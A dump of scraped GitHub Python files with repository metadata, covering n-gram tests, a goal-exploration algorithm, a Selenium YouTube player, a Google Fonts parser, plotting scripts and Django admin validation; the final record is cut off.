False, None, None, 1, self.num_ngrams)\n\n self.assertEqual(expected_output, actual_output)\n\n def test_popular_ngrams_by_set_focus(self):\n expected_output = {'cold air flow', 'constant temperature', 'freezing chamber', 'ice store ready',\n 'utility chamber'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, 'set', None, 1, self.num_ngrams)\n self.assertEqual(expected_output, actual_output)\n\n def test_popular_ngrams_by_chi2_focus(self):\n expected_output = {'constant temperature', 'ice store', 'ice store ready', 'refrigerating chamber',\n 'store ready'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, 'chi2', None, 1,\n self.num_ngrams)\n self.assertEqual(expected_output, actual_output)\n\n def test_popular_ngrams_by_mutual_focus(self):\n expected_output = {'refrigerating chamber', 'upper section', 'upper space', 'utility chamber', 'warm section'}\n _, actual_output, _ = self.tfocus.detect_and_focus_popular_ngrams('sum', False, 'mutual', None, 1,\n self.num_ngrams)\n self.assertEqual(expected_output, actual_output)\n", "repo_name": "datasciencecampus/pygrams", "sub_path": "tests/algorithms/test_focus.py", "file_name": "test_focus.py", "file_ext": "py", "file_size_in_byte": 2278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 59, "dataset": "github-code", "pt": "52", "api": [{"api_name": "unittest.TestCase", "line_number": 10, "usage_type": "attribute"}, {"api_name": "scripts.tfidf_wrapper.tfidf_from_text", "line_number": 15, "usage_type": "call"}, {"api_name": "tests.utils.ReferenceData.cold_df", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tests.utils.ReferenceData", "line_number": 15, "usage_type": "name"}, {"api_name": "scripts.text_processing.LemmaTokenizer", "line_number": 15, "usage_type": "call"}, {"api_name": "scripts.tfidf_wrapper.tfidf_from_text", "line_number": 16, "usage_type": "call"}, {"api_name": "tests.utils.ReferenceData.random_df", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tests.utils.ReferenceData", "line_number": 16, "usage_type": "name"}, {"api_name": "scripts.text_processing.LemmaTokenizer", "line_number": 16, "usage_type": "call"}, {"api_name": "scripts.algorithms.term_focus.TermFocus", "line_number": 17, "usage_type": "call"}, {"api_name": "unittest.skip", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "15043608307", "text": "import torch\nimport random\nimport os\nfrom addict import Dict\nfrom evocraftsearch import Explorer\nfrom evocraftsearch.spaces import BoxSpace\nfrom evocraftsearch.utils import sample_value\nimport numbers\nfrom tqdm import tqdm\nfrom exputils.seeding import set_seed\n\nclass BoxGoalSpace(BoxSpace):\n def __init__(self, representation, autoexpand=True, low=0., high=0., shape=None, dtype=torch.float32):\n self.representation = representation\n self.autoexpand = autoexpand\n if shape is not None:\n if isinstance(shape, list) or isinstance(shape, tuple):\n assert len(shape) == 1 and shape[0] == self.representation.n_latents\n elif isinstance(shape, numbers.Number):\n assert shape == self.representation.n_latents\n BoxSpace.__init__(self, low=low, high=high, shape=(self.representation.n_latents,), dtype=dtype)\n\n\n def map(self, observations, **kwargs):\n embedding = self.representation.calc(observations, **kwargs)\n if self.autoexpand:\n embedding_c = embedding.cpu().detach()\n is_nan_mask = torch.isnan(embedding_c)\n if is_nan_mask.sum() > 0:\n embedding_c[is_nan_mask] = self.low[is_nan_mask]\n self.low = torch.min(self.low, embedding_c)\n embedding_c[is_nan_mask] = self.high[is_nan_mask]\n self.high = torch.max(self.high, embedding_c)\n else:\n self.low = torch.min(self.low, embedding_c)\n self.high = torch.max(self.high, embedding_c)\n return embedding\n\n def calc_distance(self, embedding_a, embedding_b, **kwargs):\n scale = (self.high - self.low).to(self.representation.config.device)\n scale[torch.where(scale == 0.0)] = 1.0\n low = self.low.to(self.representation.config.device)\n # L2 by default\n embedding_a = (embedding_a - low) / scale\n embedding_b = (embedding_b - low) / scale\n dist = (embedding_a - embedding_b).pow(2).sum(-1).sqrt()\n return dist\n\n def sample(self):\n return BoxSpace.sample(self).to(self.representation.config.device)\n\n def save(self, filepath):\n torch.save(self, filepath)\n\n @staticmethod\n def load(filepath, map_location='cpu'):\n goal_space = torch.load(filepath, map_location='cpu')\n return goal_space\n\n\n\n\nclass IMGEPExplorer(Explorer):\n \"\"\"\n Basic explorer that samples goals in a goalspace and uses a policy library to generate parameters to reach the goal.\n \"\"\"\n\n # Set these in ALL subclasses\n goal_space = None # defines the obs->goal representation and the goal sampling strategy (self.goal_space.sample())\n reach_goal_optimizer = None\n\n @staticmethod\n def default_config():\n default_config = Dict()\n # base config\n default_config.seed = None\n default_config.num_of_random_initialization = 10 # number of random runs at the beginning of exploration to populate the IMGEP memory\n default_config.frequency_of_random_initialization = 10 # number of random runs at during exploration\n\n # Pi: source policy parameters config\n default_config.source_policy_selection = Dict()\n default_config.source_policy_selection.type = 'optimal'\n # default_config.source_policy_selection.type = 'kNN_elite'\n # default_config.source_policy_selection.k = 50\n\n # Opt: Optimizer to reach goal\n default_config.reach_goal_optim_steps = 10\n\n return default_config\n\n def __init__(self, system, explorationdb, goal_space, config={}, score_function=None, **kwargs):\n super().__init__(system=system, explorationdb=explorationdb, config=config, **kwargs)\n\n self.goal_space = goal_space\n\n # initialize policy library\n self.policy_library = []\n\n # initialize goal library\n self.goal_library = torch.empty((0,) + self.goal_space.shape).to(self.goal_space.representation.config.device)\n\n # save score function f(observations) = score\n self.score_function = score_function\n\n # initialize policy scores\n self.policy_scores = []\n\n\n def get_source_policy_idx(self, target_goal):\n\n if self.config.source_policy_selection.type == 'optimal':\n # get distance to other goals\n goal_distances = self.goal_space.calc_distance(target_goal, self.goal_library)\n\n # select goal with minimal distance\n isnan_distances = torch.isnan(goal_distances)\n if (~isnan_distances).sum().item() == 0:\n source_policy_idx = sample_value(('discrete', 0, len(self.goal_library) - 1))\n else:\n canditates = torch.where(goal_distances == goal_distances[~isnan_distances].min())[0]\n source_policy_idx = random.choice(canditates)\n\n elif self.config.source_policy_selection.type == \"kNN_elite\":\n # get distance to other goals\n goal_distances = self.goal_space.calc_distance(target_goal, self.goal_library)\n\n # select k closest reached goals\n isnan_distances = torch.isnan(goal_distances)\n if (~isnan_distances).sum().item() == 0:\n source_policy_idx = sample_value(('discrete', 0, len(self.goal_library) - 1))\n else:\n notnan_inds = torch.where(~isnan_distances)[0]\n notnan_distances = goal_distances[~isnan_distances]\n _, rel_candidates = notnan_distances.topk(min(self.config.source_policy_selection.k, len(notnan_distances)), largest=False)\n candidates = notnan_inds[rel_candidates]\n\n # select elite among those k\n candidate_scores = torch.tensor(self.policy_scores)[candidates]\n isnan_scores = torch.isnan(candidate_scores)\n source_policy_candidates = torch.where(candidate_scores == candidate_scores[~isnan_scores].max())[0]\n source_policy_idx = random.choice(candidates[source_policy_candidates])\n\n\n elif self.config.source_policy_selection.type == 'random':\n source_policy_idx = sample_value(('discrete', 0, len(self.goal_library) - 1))\n\n else:\n raise ValueError('Unknown source policy selection type {!r} in the configuration!'.format(\n self.config.source_policy_selection.type))\n\n return source_policy_idx\n\n def run(self, n_exploration_runs, continue_existing_run=False, save_frequency=None, save_filepath=None):\n\n print('Exploration: ')\n progress_bar = tqdm(total=n_exploration_runs)\n if continue_existing_run:\n run_idx = len(self.policy_library)\n progress_bar.update(run_idx)\n else:\n self.policy_library = []\n self.goal_library = torch.empty((0,) + self.goal_space.shape)\n run_idx = 0\n\n self.goal_library = self.goal_library.to(self.goal_space.representation.config.device)\n\n while run_idx < n_exploration_runs:\n\n set_seed(100000 * self.config.seed + run_idx)\n\n # Initial Random Sampling of Parameters\n if (run_idx < self.config.num_of_random_initialization) or (run_idx % self.config.frequency_of_random_initialization == 0):\n\n target_goal = None\n source_policy_idx = None\n\n policy_parameters = self.system.sample_policy_parameters()\n self.system.reset(policy=policy_parameters)\n\n with torch.no_grad():\n observations = self.system.run()\n reached_goal = self.goal_space.map(observations)\n if self.score_function is not None:\n policy_score = self.score_function.map(observations).item()\n else:\n policy_score = 0.0\n\n optim_step_idx = 0\n dist_to_target = None\n\n # Goal-directed Sampling of Parameters\n else:\n\n # sample a goal space from the goal space\n target_goal = self.goal_space.sample() # provide the explorer to sampling function if needed (ef: for sampling in less dense region we need access to self.goal_library, etc)\n\n # get source policy which should be mutated\n source_policy_idx = self.get_source_policy_idx(target_goal)\n source_policy = self.policy_library[source_policy_idx]\n\n # apply a mutation\n policy_parameters = self.system.mutate_policy_parameters(source_policy)\n self.system.reset(policy=policy_parameters)\n\n # Optimization toward target goal\n if isinstance(self.system, torch.nn.Module) and self.config.reach_goal_optim_steps > 0:\n\n train_losses = self.system.optimize(self.config.reach_goal_optim_steps, lambda obs: self.goal_space.calc_distance(target_goal, self.goal_space.map(obs)))\n print(train_losses)\n policy_parameters['initialization'] = self.system.initialization_parameters\n policy_parameters['update_rule'] = self.system.update_rule_parameters\n\n with torch.no_grad():\n observations = self.system.run()\n reached_goal = self.goal_space.map(observations)\n loss = self.goal_space.calc_distance(target_goal, reached_goal)\n dist_to_target = loss.item()\n if self.score_function is not None:\n policy_score = self.score_function.map(observations).item()\n else:\n policy_score = 0.0\n\n # save results\n self.db.add_run_data(id=run_idx,\n policy_parameters=policy_parameters,\n observations=observations,\n source_policy_idx=source_policy_idx,\n target_goal=target_goal,\n reached_goal=reached_goal,\n dist_to_target=dist_to_target,\n policy_score=policy_score)\n\n if self.db.config.save_rollout_render:\n self.system.render_rollout(observations, filepath=os.path.join(self.db.config.db_directory,\n f'run_{run_idx}_rollout'))\n\n\n # add policy and reached goal into the libraries\n # do it after the run data is saved to not save them if there is an error during the saving\n self.policy_library.append(policy_parameters)\n self.policy_scores.append(policy_score)\n self.goal_library = torch.cat([self.goal_library, reached_goal.reshape(1, -1)])\n\n if (save_frequency is not None) and (run_idx % save_frequency == 0):\n if (save_filepath is not None) and (os.path.exists(save_filepath)):\n self.save(save_filepath)\n\n # increment run_idx\n run_idx += 1\n progress_bar.update(1)\n\n def save(self, filepath):\n self.goal_space.save(filepath+\"goal_space.pickle\")\n tmp_goal_space = self.goal_space\n self.goal_space = None\n tmp_score_function = self.score_function\n self.score_function = None\n Explorer.save(self, filepath+\"explorer.pickle\")\n self.goal_space = tmp_goal_space\n self.score_function = tmp_score_function", "repo_name": "mayalenE/evocraftsearch", "sub_path": "explorers/imgep_explorer.py", "file_name": "imgep_explorer.py", "file_ext": "py", "file_size_in_byte": 11526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 12, "usage_type": "name"}, {"api_name": "torch.float32", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numbers.Number", "line_number": 19, "usage_type": "attribute"}, {"api_name": "evocraftsearch.spaces.BoxSpace.__init__", "line_number": 21, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.isnan", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.min", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 41, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace.sample", "line_number": 50, "usage_type": "call"}, {"api_name": "evocraftsearch.spaces.BoxSpace", "line_number": 50, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 57, "usage_type": "call"}, {"api_name": "evocraftsearch.Explorer", "line_number": 63, "usage_type": "name"}, {"api_name": "addict.Dict", "line_number": 74, "usage_type": "call"}, {"api_name": "addict.Dict", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 116, "usage_type": "call"}, {"api_name": "evocraftsearch.utils.sample_value", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 120, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 128, "usage_type": "call"}, {"api_name": "evocraftsearch.utils.sample_value", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.isnan", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.where", "line_number": 140, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 141, "usage_type": "call"}, {"api_name": "evocraftsearch.utils.sample_value", "line_number": 145, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.empty", "line_number": 162, "usage_type": "call"}, {"api_name": "exputils.seeding.set_seed", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 180, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 206, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 213, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 234, "usage_type": "call"}, {"api_name": "os.path", "line_number": 234, "usage_type": "attribute"}, {"api_name": "torch.cat", "line_number": 242, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "evocraftsearch.Explorer.save", "line_number": 258, "usage_type": "call"}, {"api_name": "evocraftsearch.Explorer", "line_number": 258, "usage_type": "name"}]} +{"seq_id": "74411110883", "text": "from time import sleep\nfrom sys import exit\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.service import Service\nfrom localStoragePy import localStoragePy\n#localStorage config\nls = localStoragePy(\"playlistDatabase\",\"json\")\n\n#driver config\noptions = webdriver.FirefoxOptions()\nuser_agent = '--user-agent=Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.1'\noptions.add_argument(user_agent)\noptions.binary_location = r'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\noptions.add_argument(\"--headless\")\noptions.add_argument(\"--log-level\")\noptions.add_argument(\"--window-size=1920,1080\")\noptions.add_argument('--ignore-certificate-errors')\noptions.add_argument(\"start-maximized\")\noptions.add_argument(\"disable-infobars\")\noptions.add_argument('--no-sandbox')\noptions.add_argument(\"--disable-gpu\")\noptions.add_argument('--disable-application-cache')\noptions.add_argument(\"--disable-dev-shm-usage\")\nser = Service(\"geckodriver.exe\")\nextension1 = \"C://Users//dipu6//Downloads//ublock_origin-1.46.0.xpi\"\nextension2 = \"C://Users//dipu6//Downloads//image_blocker_plus-0.2.0.xpi\"\ndriver = webdriver.Firefox(service=ser,options=options)\ndriver.install_addon(extension1, temporary=True)\ndriver.install_addon(extension2, temporary=True)\n\n#functions\n#songs\ndef stream(MusicName):\n MusicName = MusicName\n driver.get(f\"https://m.youtube.com/results?search_query={MusicName}\")\n driver.implicitly_wait(3)\n video =driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-search/div[1]/ytd-two-column-search-results-renderer/div[2]/div/ytd-section-list-renderer/div[2]/ytd-item-section-renderer/div[3]/ytd-video-renderer[1]/div[1]/div/div[1]/div/h3/a/yt-formatted-string\")\n video.click()\n\ndef pauseAndPlay():\n pauseVideo = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div[2]/div/div/ytd-player/div/div/div[1]/video\")\n driver.implicitly_wait(1)\n pauseVideo.click()\n\ndef track():\n track = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[2]/ytd-watch-metadata/div/div[1]/h1/yt-formatted-string\")\n artist = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[2]/ytd-watch-metadata/div/div[2]/div[1]/ytd-video-owner-renderer/div[1]/ytd-channel-name/div/div/yt-formatted-string/a\")\n print(f\"{track.text} - {artist.text}\")\n\ndef next():\n next = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div[2]/div/div/ytd-player/div/div/div[27]/div[2]/div[1]/a[2]\")\n driver.implicitly_wait(1)\n next.click()\n\ndef previous():\n previous = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-watch-flexy/div[5]/div[1]/div/div[1]/div[2]/div/div/ytd-player/div/div/div[27]/div[2]/div[1]/a[1]\")\n driver.implicitly_wait(1)\n previous.click()\n\n\n#playlists\ndef streamPlaylist(playlistName):\n url = ls.getItem(playlistName)\n\n if url != None:\n driver.get(url)\n driver.implicitly_wait(2.5)\n shuffle = driver.find_element(\"xpath\",\"/html/body/ytd-app/div[1]/ytd-page-manager/ytd-browse/ytd-playlist-header-renderer/div/div[2]/div[1]/div/div[2]/ytd-button-renderer[2]/yt-button-shape/a/yt-touch-feedback-shape/div/div[2]\")\n shuffle.click()\n else:\n print(\"playlist not found......\")\n print(\"re enter name properly\")\n\ndef addPlaylist(name, url):\n ls.setItem(name,url)\n sleep(1)\n print(\"stored....\")\n\ndef removePlaylist(playlistName):\n ls.removeItem(playlistName)\n print(\"removed....\")\n\ndef stop():\n driver.quit()\n exit(1)\n\n\nif __name__ == \"__main__\":\n print(\"Enter the name of song or choose playlist:\")\n while True:\n uinput = str(input())\n if uinput.split(\" \",1)[0] == \"st\":\n songName = uinput.split(\" \",1)[1]\n stream(songName)\n\n elif uinput == \"stop\":\n stop()\n\n elif uinput == \"play\" or uinput == \"pause\":\n pauseAndPlay()\n\n elif uinput == \"track\":\n track()\n\n elif uinput.split(\" \",1)[0] == \"pt\":\n pName = uinput.split(\" \",1)[1]\n streamPlaylist(pName)\n\n elif uinput.split(\" \",1)[0] == 'add':\n url = uinput.split(\" \", 1)[1]\n Name = str(input(\"enter name of playlist:\"))\n addPlaylist(Name, url)\n\n elif uinput.split(\" \",1)[0] == \"rem\":\n name = uinput.split(\" \",1)[1]\n removePlaylist(name)\n\n elif uinput == \"next\":\n next()\n\n elif uinput == \"prev\":\n previous()\n\n else:\n print(\"..Invalid Command..\")\n", "repo_name": "toastx/YoutubeMusicPlayer", "sub_path": "Player.py", "file_name": "Player.py", "file_ext": "py", "file_size_in_byte": 4921, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "localStoragePy.localStoragePy", "line_number": 7, "usage_type": "call"}, {"api_name": "selenium.webdriver.FirefoxOptions", "line_number": 10, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 10, "usage_type": "name"}, {"api_name": "selenium.webdriver.firefox.service.Service", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 85, "usage_type": "call"}]} +{"seq_id": "72427012005", "text": "import requests\nimport json\nfrom typing import Union\nimport os\nimport re\nfrom dotenv import load_dotenv\n\n# Load .env file\nload_dotenv()\n\n\ndef prepare_url(url: str) -> str:\n \"\"\" Prepare url for Google Fonts API.\n :param url: Google Fonts API url.\n :return: Prepared url.\n :throw: None.\n :rtype: str.\n :Example:\n >>> prepare_url(url)\n \"\"\"\n return url.replace(':KEY', os.getenv('GOOGLE_API_KEY'))\n\n\ndef get_fonts_from_gapi(url: str) -> Union[dict, None]:\n \"\"\" Get fonts from Google Fonts API.\n :param url: Google Fonts API url.\n :return: Dictionary with fonts if successful, None otherwise.\n :throw: None.\n :rtype: dict or None.\n :Example:\n >>> get_fonts(url)\n \"\"\"\n try:\n response = requests.get(url)\n if response.status_code == 200:\n data = json.loads(response.text)\n return data[\"items\"]\n else:\n return None\n except Exception as e:\n return None\n\n\ndef parse_fonts(fonts: dict) -> dict:\n \"\"\" Parse fonts from Google Fonts API.\n :param fonts: Dictionary with fonts.\n :return: Dictionary with parsed fonts.\n :throw: None.\n :rtype: dict.\n :Example:\n >>> parse_fonts(fonts)\n \"\"\"\n data = {\n \"languages\": [],\n \"fonts\": [],\n \"categories\": []\n }\n for font in fonts:\n languages = font['subsets']\n category = font['category']\n for lang in languages:\n # Remove '-' with space and capatilize first letter.\n lang = lang.replace('-', ' ')\n lang = ' '.join(word.capitalize() for word in lang.split())\n\n if lang not in data['languages']:\n data['languages'].append(lang)\n if category not in data['categories']:\n data['categories'].append(category)\n \n v = font['variants']\n variants = []\n for variant in v:\n # search numeric with italic\n if re.search(r'\\d+italic', variant):\n variants.append(variant.replace('italic', 'i'))\n elif variant == 'regular': continue\n else:\n variants.append(variant)\n \n data['fonts'].append(\n {\n # remove space with +.\n 'family': font['family'].replace(' ', '+'),\n 'variants': variants,\n # 'files': font['files'],\n # 'lastModified': font['lastModified'],\n 'subsets': languages,\n 'category': category\n }\n )\n return data\n\n\ndef create_json(data: dict, path: str = 'fonts.json') -> None:\n \"\"\" Create json file with fonts.\n :param data: Dictionary with fonts.\n :return: None.\n :throw: None.\n :rtype: None.\n :Example:\n >>> create_json(data)\n \"\"\"\n with open(path, 'w') as f:\n json.dump(data, f, indent=4)\n", "repo_name": "lablnet/fontpicker", "sub_path": "script/fonts.py", "file_name": "fonts.py", "file_ext": "py", "file_size_in_byte": 2874, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 9, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 34, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 24, "usage_type": "name"}, {"api_name": "re.search", "line_number": 75, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "43341856944", "text": "import numpy as np\nimport plotly.graph_objects as go\n\npoints = np.array([\n (-2, 0, 0),\n (2, 0, 0),\n (1, 2, 2)\n])\n\nplane1 = np.array([\n (-2.5, 0.45, -.25),\n (-1.5, 0.1, -.25),\n (-1.5, 0.1, 0.25),\n (-2.5, 0.45, 0.25),\n])\n\nplane2 = np.array([\n (1.5, 0.1, -.25),\n (2.5, 0.4, -.25),\n (2.5, 0.4, 0.25),\n (1.5, 0.1, 0.25),\n])\n\ntriangle = go.Scatter3d(\n x=points[:, 0], y=points[:, 1], z=points[:, 2],\n text=[\"Camera 1\", \"Camera 2\", \"X\"], hoverinfo='none',\n mode='markers+text'\n)\n\ntriangle_plane = go.Mesh3d(\n x=points[:, 0], y=points[:, 1], z=points[:, 2], opacity=0.50, hoverinfo='none'\n)\n\nplane1 = go.Mesh3d(\n x=plane1[:, 0], y=plane1[:, 1], z=plane1[:, 2],\n i=[0, 0], j=[1, 2], k=[2, 3], hoverinfo='none',\n name=\"image plane 1\"\n)\n\nplane2 = go.Mesh3d(\n x=plane2[:, 0], y=plane2[:, 1], z=plane2[:, 2],\n i=[0, 0], j=[1, 2], k=[2, 3], hoverinfo='none',\n name=\"image plane 2\"\n)\n\nfig = go.Figure(data=[triangle, triangle_plane, plane1, plane2])\n\nfig.update_layout(margin=dict(l=0, r=0, b=0, t=0))\nwith open(\"../assets/epipolar.json\", \"w\") as f:\n f.write(fig.to_json())\n", "repo_name": "haoda-li/notebook", "sub_path": "notebook/cs294173/scripts/epipolar.py", "file_name": "epipolar.py", "file_ext": "py", "file_size_in_byte": 1125, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 27, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.array", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 17, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Scatter3d", "line_number": 24, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 24, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Mesh3d", "line_number": 30, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 30, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Mesh3d", "line_number": 34, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 34, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Mesh3d", "line_number": 40, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 40, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 46, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 46, "usage_type": "name"}]} +{"seq_id": "70844282404", "text": "import pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nfrom src.util.utils import get_project_root\n\n\nclass Plotter:\n data_dir = os.path.join(str(get_project_root()), 'data')\n\n def create_wiki_dataframe(self):\n file_path = os.path.join(self.data_dir, 'wiki-covid-19-germany-2020-02-24--2020-03-16.txt')\n return pd.read_csv(file_path, header=0, index_col=0, thousands='.', sep='\\t') \\\n .replace(u'\\u2014', 0) \\\n .transpose() \\\n .astype(float)\n\n @staticmethod\n def display_county_histogram(df):\n print(df.columns)\n df.plot(kind='line', logy=True, ylim=(10, df['Gesamt'].max() + 1000))\n plt.legend(loc='upper left', ncol=2)\n plt.show()\n\n\nif __name__ == \"__main__\":\n dw = Plotter()\n dw.display_county_histogram(dw.create_wiki_dataframe())\n", "repo_name": "StefanieStoppel/covid19-scraper", "sub_path": "src/plotting/plotter.py", "file_name": "plotter.py", "file_ext": "py", "file_size_in_byte": 834, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "src.util.utils.get_project_root", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "17495199079", "text": "from django.contrib import admin\nfrom .models import Article, ArticleTags, Tags\nfrom django.forms import BaseInlineFormSet\nfrom django.core.exceptions import ValidationError\n\n\n\nclass RelationshipInlineForm(BaseInlineFormSet):\n def clean(self):\n is_main = 0\n for form in self.forms:\n print(form.cleaned_data)\n if form.cleaned_data:\n print(form.cleaned_data['is_main'])\n if form.cleaned_data['is_main']==True:\n is_main += True\n if is_main == 1:\n return super().clean()\n elif is_main == 0:\n raise ValidationError('Укажите основной раздел')\n else:\n raise ValidationError('Основным может быть только один раздел')\n\nclass RelationshipInline(admin.TabularInline):\n model = ArticleTags\n formset = RelationshipInlineForm\n extra = 1\n\n@admin.register(Article)\nclass ArticlAdmin(admin.ModelAdmin):\n inlines = [RelationshipInline]\n\n@admin.register(Tags)\nclass TagsAdmin(admin.ModelAdmin):\n pass\n\n@admin.register(ArticleTags)\nclass ArticleTagsAdmin(admin.ModelAdmin):\n list_display = ['id', 'article', 'tag', 'is_main']\n", "repo_name": "KostapaSh/my-dj-homeworks", "sub_path": "2.2-databases-2/m2m-relations/articles/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 1220, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.BaseInlineFormSet", "line_number": 8, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 20, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 22, "usage_type": "call"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 24, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 24, "usage_type": "name"}, {"api_name": "models.ArticleTags", "line_number": 25, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Article", "line_number": 29, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 29, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 34, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 34, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Tags", "line_number": 33, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 33, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 38, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 38, "usage_type": "name"}, {"api_name": "django.contrib.admin.register", "line_number": 37, "usage_type": "call"}, {"api_name": "models.ArticleTags", "line_number": 37, "usage_type": "argument"}, {"api_name": "django.contrib.admin", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "6152424120", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Apr 22 17:25:38 2020\r\n\r\n@author: tom9m\r\n\"\"\"\r\n\r\nimport scipy.special\r\nfrom sklearn import preprocessing\r\nimport numpy as np\r\nimport 